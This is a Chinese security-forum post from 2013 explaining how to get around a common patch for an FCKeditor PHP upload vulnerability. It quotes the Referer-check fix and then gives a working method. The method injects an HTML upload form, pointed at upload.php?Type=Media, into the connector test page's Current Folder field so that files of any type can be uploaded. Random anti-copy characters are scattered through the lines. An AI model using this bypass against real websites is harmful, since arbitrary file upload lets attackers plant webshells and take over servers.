找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2170|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
! b1 T* H- S/ G' n; }网上给出的修复方案是
! C2 n& W5 u: u6 C  \5 M% G  {% [4 Q修复方法,删除FCK编辑器用其他的编辑器
0 z1 f( q6 f" b( f3 N/ H9 H或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件! c% L5 b6 G8 J+ r2 w  H) H

0 P- k* l+ a. a, `require(‘config.php’);7 a! @) f& }5 A. B; t: Y* `
require(‘util.php’);: m! s) ^. T+ ~* B4 d; @8 L# ]
的下面添加以下代码—————————–
  f6 l, r% h$ s7 J//防止外部提交
: T! s8 g5 u+ F; Yfunction outsidepost()
" j8 N0 S2 V4 t2 A) P6 ~{
4 D) |6 M# V, c' u9 d. i9 ?$servername=$_SERVER['SERVER_NAME'];" [' E5 I7 y' l  |+ `9 F
$sub_from=@$_SERVER['HTTP_REFERER'];2 I4 ^% n# g" o: H: H2 Y
$sub_len=strlen($servername);% R% P  |4 K( ^% l% A
$checkfrom=substr($sub_from,7,$sub_len);. T& ]/ y* h9 N/ g" d9 ^
if($checkfrom!=$servername){5 g" G9 t# y3 ?
echo(“you don’t outsidepost!”);
( p. w' z; A; Xexit;% Q4 V& H& O: z% M) Q& g
}
( @8 w* W) h( E  C# o, F}
8 @) n/ V3 L% f! Voutsidepost();4 \0 }* g4 P8 {9 K+ t; r6 {4 j- R. S
防止外部提交,但是没有防止内部提交,
4 x/ q  Y& r1 k; |* z8 c; h利用方法:. M* s: U" X: y! P- W  _
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
. P& \# F( |2 E2 H2,在Current Folder 框输入' a/ z. e6 X! x/ P5 C
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>; R+ ~5 \2 V) _/ H9 ~, C
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
2 }1 n4 O% E& c/ Q, A) [PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表